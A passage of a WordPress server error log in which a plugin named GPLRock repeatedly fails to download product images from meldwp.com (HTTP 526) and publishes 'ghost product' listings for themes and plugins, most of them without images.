06:56:41 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-event-manager-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-event-manager-plugin-9847.webp [04-Apr-2026 06:56:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-event-manager-plugin [04-Apr-2026 06:56:41 UTC] GPLRock: Image download failed for product woocommerce-registration-fields-plugin-custom-signup-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:43 UTC] GPLRock: Image download failed for product woocommerce-registration-fields-plugin-custom-signup-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-registration-fields-plugin---custom-signup-fields-27952.webp for product woocommerce-registration-fields-plugin-custom-signup-fields after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:46 UTC] GPLRock: Image download failed for product woocommerce-registration-fields-plugin-custom-signup-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:48 UTC] GPLRock: Image download failed for product woocommerce-registration-fields-plugin-custom-signup-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:56:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-registration-fields-plugin---custom-signup-fields-27952.webp for product woocommerce-registration-fields-plugin-custom-signup-fields after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:56:50 UTC] GPLRock WARNING: Image download failed for product woocommerce-registration-fields-plugin-custom-signup-fields. URL: https://meldwp.com/wp-content/uploads/woocommerce-registration-fields-plugin---custom-signup-fields-27952.webp [04-Apr-2026 06:56:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-registration-fields-plugin-custom-signup-fields [04-Apr-2026 06:56:58 UTC] GPLRock: Image download failed for product jollyany-corporate-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:00 UTC] GPLRock: Image download failed for product jollyany-corporate-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jollyany---corporate-multi-purpose-wordpress-theme-26002.webp for product jollyany-corporate-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:03 UTC] GPLRock: Image download failed for product jollyany-corporate-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:05 UTC] GPLRock: Image download failed for product jollyany-corporate-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jollyany---corporate-multi-purpose-wordpress-theme-26002.webp for product jollyany-corporate-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:07 UTC] GPLRock WARNING: Image download failed for product jollyany-corporate-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jollyany---corporate-multi-purpose-wordpress-theme-26002.webp [04-Apr-2026 06:57:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jollyany-corporate-multi-purpose-wordpress-theme [04-Apr-2026 06:57:07 UTC] GPLRock: Image download failed for product humani-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:09 UTC] GPLRock: Image download failed for product humani-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/humani---nonprofit--charity-wordpress-theme-5610.webp for product humani-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:11 UTC] GPLRock: Image download failed for product humani-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:14 UTC] GPLRock: Image download failed for product humani-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/humani---nonprofit--charity-wordpress-theme-5610.webp for product humani-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:16 UTC] GPLRock WARNING: Image download failed for product humani-nonprofit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/humani---nonprofit--charity-wordpress-theme-5610.webp [04-Apr-2026 06:57:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: humani-nonprofit-charity-wordpress-theme [04-Apr-2026 06:57:16 UTC] GPLRock: Image downloaded successfully for product adrenalin-multi-purpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaa5c12a.webp [04-Apr-2026 06:57:16 UTC] GPLRock: Using pre-downloaded image for product adrenalin-multi-purpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaa5c12a.webp [04-Apr-2026 06:57:16 UTC] GPLRock: Ghost product published with image - Product ID: adrenalin-multi-purpose-woocommerce-theme [04-Apr-2026 06:57:16 UTC] GPLRock: Image download failed for product honshi-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:18 UTC] GPLRock: Image download failed for product honshi-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/honshi---creative-portfolio-wordpress-theme-27426.webp for product honshi-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:20 UTC] GPLRock: Image download failed for product honshi-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:22 UTC] GPLRock: Image download failed for product honshi-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/honshi---creative-portfolio-wordpress-theme-27426.webp for product honshi-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:25 UTC] GPLRock WARNING: Image download failed for product honshi-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/honshi---creative-portfolio-wordpress-theme-27426.webp [04-Apr-2026 06:57:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: honshi-creative-portfolio-wordpress-theme [04-Apr-2026 06:57:25 UTC] GPLRock: Image download failed for product berly-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:27 UTC] GPLRock: Image download failed for product berly-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/berly---portfolio-wordpress-theme-19807.webp for product berly-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:29 UTC] GPLRock: Image download failed for product berly-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:31 UTC] GPLRock: Image download failed for product berly-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/berly---portfolio-wordpress-theme-19807.webp for product berly-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:33 UTC] GPLRock WARNING: Image download failed for product berly-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/berly---portfolio-wordpress-theme-19807.webp [04-Apr-2026 06:57:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: berly-portfolio-wordpress-theme [04-Apr-2026 06:57:34 UTC] GPLRock: Image download failed for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:36 UTC] GPLRock: Image download failed for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidsy--kids-store-and-baby-shop-woocommerce-wordpress-theme-27986.webp for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:38 UTC] GPLRock: Image download failed for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:40 UTC] GPLRock: Image download failed for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidsy--kids-store-and-baby-shop-woocommerce-wordpress-theme-27986.webp for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:42 UTC] GPLRock WARNING: Image download failed for product kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kidsy--kids-store-and-baby-shop-woocommerce-wordpress-theme-27986.webp [04-Apr-2026 06:57:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kidsy-kids-store-and-baby-shop-woocommerce-wordpress-theme [04-Apr-2026 06:57:42 UTC] GPLRock: Image download failed for product kappe-full-screen-portfolio-blog-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:44 UTC] GPLRock: Image download failed for product kappe-full-screen-portfolio-blog-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kappe---full-screen-portfolio--blog-wp-theme-31579.webp for product kappe-full-screen-portfolio-blog-wp-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:47 UTC] GPLRock: Image download failed for product kappe-full-screen-portfolio-blog-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:49 UTC] GPLRock: Image download failed for product kappe-full-screen-portfolio-blog-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kappe---full-screen-portfolio--blog-wp-theme-31579.webp for product kappe-full-screen-portfolio-blog-wp-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:51 UTC] GPLRock WARNING: Image download failed for product kappe-full-screen-portfolio-blog-wp-theme. URL: https://meldwp.com/wp-content/uploads/kappe---full-screen-portfolio--blog-wp-theme-31579.webp [04-Apr-2026 06:57:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kappe-full-screen-portfolio-blog-wp-theme [04-Apr-2026 06:57:51 UTC] GPLRock: Image download failed for product skudmart-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:53 UTC] GPLRock: Image download failed for product skudmart-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skudmart---minimal-woocommerce-theme-1594.webp for product skudmart-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:57:55 UTC] GPLRock: Image download failed for product skudmart-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:57:58 UTC] GPLRock: Image download failed for product skudmart-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skudmart---minimal-woocommerce-theme-1594.webp for product skudmart-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:58:00 UTC] GPLRock WARNING: Image download failed for product skudmart-minimal-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/skudmart---minimal-woocommerce-theme-1594.webp [04-Apr-2026 06:58:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: skudmart-minimal-woocommerce-theme [04-Apr-2026 06:58:00 UTC] GPLRock: Image download failed for product edukul-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:02 UTC] GPLRock: Image download failed for product edukul-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edukul--online-courses-wordpress-theme-18721.webp for product edukul-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:58:05 UTC] GPLRock: Image download failed for product edukul-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:07 UTC] GPLRock: Image download failed for product edukul-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edukul--online-courses-wordpress-theme-18721.webp for product edukul-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:58:09 UTC] GPLRock WARNING: Image download failed for product edukul-online-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edukul--online-courses-wordpress-theme-18721.webp [04-Apr-2026 06:58:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edukul-online-courses-wordpress-theme [04-Apr-2026 06:58:09 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:58:11 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:30 UTC] GPLRock: Image downloaded successfully for product herr-digital-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3cc530f7.webp [04-Apr-2026 07:32:31 UTC] GPLRock: Using pre-downloaded image for product herr-digital-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3cc530f7.webp [04-Apr-2026 07:32:31 UTC] GPLRock: Ghost product published with image - Product ID: herr-digital-magazine-wordpress-theme [04-Apr-2026 07:32:31 UTC] GPLRock: Image download failed for product omnia-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:33 UTC] GPLRock: Image download failed for product omnia-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omnia---multipurpose-creative-wordpress-theme-25041.webp for product omnia-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:35 UTC] GPLRock: Image download failed for product omnia-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:37 UTC] GPLRock: Image download failed for product omnia-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omnia---multipurpose-creative-wordpress-theme-25041.webp for product omnia-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:39 UTC] GPLRock WARNING: Image download failed for product omnia-multipurpose-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/omnia---multipurpose-creative-wordpress-theme-25041.webp [04-Apr-2026 07:32:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: omnia-multipurpose-creative-wordpress-theme [04-Apr-2026 07:32:39 UTC] GPLRock: Image download failed for product dance-wordpress-theme-dancing-academy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:41 UTC] GPLRock: Image download failed for product dance-wordpress-theme-dancing-academy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dance-wordpress-theme---dancing-academy-13067.webp for product dance-wordpress-theme-dancing-academy after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:44 UTC] GPLRock: Image download failed for product dance-wordpress-theme-dancing-academy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:46 UTC] GPLRock: Image download failed for product dance-wordpress-theme-dancing-academy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dance-wordpress-theme---dancing-academy-13067.webp for product dance-wordpress-theme-dancing-academy after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:48 UTC] GPLRock WARNING: Image download failed for product dance-wordpress-theme-dancing-academy. URL: https://meldwp.com/wp-content/uploads/dance-wordpress-theme---dancing-academy-13067.webp [04-Apr-2026 07:32:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dance-wordpress-theme-dancing-academy [04-Apr-2026 07:32:48 UTC] GPLRock: Image download failed for product denzel-creative-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:50 UTC] GPLRock: Image download failed for product denzel-creative-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/denzel---creative-minimal-portfolio-wordpress-theme-8498.webp for product denzel-creative-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:52 UTC] GPLRock: Image download failed for product denzel-creative-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:54 UTC] GPLRock: Image download failed for product denzel-creative-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/denzel---creative-minimal-portfolio-wordpress-theme-8498.webp for product denzel-creative-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:32:56 UTC] GPLRock WARNING: Image download failed for product denzel-creative-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/denzel---creative-minimal-portfolio-wordpress-theme-8498.webp [04-Apr-2026 07:32:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: denzel-creative-minimal-portfolio-wordpress-theme [04-Apr-2026 07:32:57 UTC] GPLRock: Image download failed for product surfy-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:32:59 UTC] GPLRock: Image download failed for product surfy-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/surfy---surfing-and-water-sports-wordpress-theme-3764.webp for product surfy-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:01 UTC] GPLRock: Image download failed for product surfy-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:03 UTC] GPLRock: Image download failed for product surfy-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/surfy---surfing-and-water-sports-wordpress-theme-3764.webp for product surfy-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:05 UTC] GPLRock WARNING: Image download failed for product surfy-surfing-and-water-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/surfy---surfing-and-water-sports-wordpress-theme-3764.webp [04-Apr-2026 07:33:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: surfy-surfing-and-water-sports-wordpress-theme [04-Apr-2026 07:33:05 UTC] GPLRock: Image download failed for product give-ngo-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:07 UTC] GPLRock: Image download failed for product give-ngo-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/give---ngo--charity-wordpress-theme-25932.webp for product give-ngo-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:10 UTC] GPLRock: Image download failed for product give-ngo-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:12 UTC] GPLRock: Image download failed for product give-ngo-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/give---ngo--charity-wordpress-theme-25932.webp for product give-ngo-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:14 UTC] GPLRock WARNING: Image download failed for product give-ngo-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/give---ngo--charity-wordpress-theme-25932.webp [04-Apr-2026 07:33:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: give-ngo-charity-wordpress-theme [04-Apr-2026 07:33:14 UTC] GPLRock: Image download failed for product the-experts-business-consulting-and-professional-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:16 UTC] GPLRock: Image download failed for product the-experts-business-consulting-and-professional-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-experts---business-consulting-and-professional-services-wordpress-theme-18715.webp for product the-experts-business-consulting-and-professional-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:19 UTC] GPLRock: Image download failed for product the-experts-business-consulting-and-professional-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:21 UTC] GPLRock: Image download failed for product the-experts-business-consulting-and-professional-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-experts---business-consulting-and-professional-services-wordpress-theme-18715.webp for product the-experts-business-consulting-and-professional-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:23 UTC] GPLRock WARNING: Image download failed for product the-experts-business-consulting-and-professional-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-experts---business-consulting-and-professional-services-wordpress-theme-18715.webp [04-Apr-2026 07:33:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-experts-business-consulting-and-professional-services-wordpress-theme [04-Apr-2026 07:33:23 UTC] GPLRock: Image download failed for product showmax-personal-portfolio-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:26 UTC] GPLRock: Image download failed for product showmax-personal-portfolio-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/showmax--personal-portfolio--showcase-wordpress-theme-31073.webp for product showmax-personal-portfolio-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:28 UTC] GPLRock: Image download failed for product showmax-personal-portfolio-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:30 UTC] GPLRock: Image download failed for product showmax-personal-portfolio-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/showmax--personal-portfolio--showcase-wordpress-theme-31073.webp for product showmax-personal-portfolio-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:32 UTC] GPLRock WARNING: Image download failed for product showmax-personal-portfolio-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/showmax--personal-portfolio--showcase-wordpress-theme-31073.webp [04-Apr-2026 07:33:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: showmax-personal-portfolio-showcase-wordpress-theme [04-Apr-2026 07:33:32 UTC] GPLRock: Image downloaded successfully for product opklim-law-firm-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29e76e54.webp [04-Apr-2026 07:33:32 UTC] GPLRock: Using pre-downloaded image for product opklim-law-firm-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29e76e54.webp [04-Apr-2026 07:33:32 UTC] GPLRock: Ghost product published with image - Product ID: opklim-law-firm-wordpress-theme [04-Apr-2026 07:33:32 UTC] GPLRock: Image download failed for product materialize-material-design-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:34 UTC] GPLRock: Image download failed for product materialize-material-design-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/materialize---material-design-multipurpose-wordpress-theme-30529.webp for product materialize-material-design-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:37 UTC] GPLRock: Image download failed for product materialize-material-design-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:39 UTC] GPLRock: Image download failed for product materialize-material-design-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/materialize---material-design-multipurpose-wordpress-theme-30529.webp for product materialize-material-design-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:33:41 UTC] GPLRock WARNING: Image download failed for product materialize-material-design-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/materialize---material-design-multipurpose-wordpress-theme-30529.webp [04-Apr-2026 07:33:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: materialize-material-design-multipurpose-wordpress-theme [04-Apr-2026 07:33:56 UTC] GPLRock: Image download failed for product calculated-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:33:58 UTC] GPLRock: Image download failed for product calculated-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calculated-field-for-elementor-form-18090.webp for product calculated-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:00 UTC] GPLRock: Image download failed for product calculated-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:02 UTC] GPLRock: Image download failed for product calculated-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calculated-field-for-elementor-form-18090.webp for product calculated-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:04 UTC] GPLRock WARNING: Image download failed for product calculated-field-for-elementor-form. URL: https://meldwp.com/wp-content/uploads/calculated-field-for-elementor-form-18090.webp [04-Apr-2026 07:34:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: calculated-field-for-elementor-form [04-Apr-2026 07:34:04 UTC] GPLRock: Image download failed for product pmotion-animated-gif-and-video-maker-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:06 UTC] GPLRock: Image download failed for product pmotion-animated-gif-and-video-maker-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:34:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pmotion---animated-gif-and-video-maker-for-wordpress-14506.webp for product pmotion-animated-gif-and-video-maker-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:34:09 UTC] GPLRock: Image download failed for product pmotion-animated-gif-and-video-maker-for-wordpress (attempt 1/3). HTTP 